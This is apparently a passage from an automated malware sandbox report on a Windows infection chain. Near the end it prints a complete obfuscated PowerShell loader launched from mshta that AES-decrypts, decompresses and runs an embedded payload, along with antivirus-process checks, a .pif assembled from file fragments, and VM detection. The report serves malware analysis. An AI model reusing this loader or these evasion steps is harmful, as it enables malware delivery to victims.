              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5205Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4278Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6211Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2562Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ProducingJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep time: -24903104499507879s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep count: 6211 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 2562 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A75080 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,8_2_00A75080
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A73C80 FindFirstFileW,FindClose,SetLastError,CompareFileTime,8_2_00A73C80
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A74ED0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,8_2_00A74ED0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
              Source: mshta.exe, 00000000.00000003.2003585857.0000000002BC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: mshta.exe, 00000000.00000003.2003585857.0000000002BC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lIa
              Source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
              Source: powershell.exe, 00000004.00000002.2125166141.0000000008CAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A79F30 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,8_2_00A79F30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A97CD5 SetUnhandledExceptionFilter,8_2_00A97CD5
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A97F44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00A97F44
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A71E40 memset,_DebugHeapAllocator,ShellExecuteExW,WaitForSingleObject,CloseHandle,8_2_00A71E40
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 30253Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 30253\m Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif 30253\Identification.pif 30253\m Jump to behavior
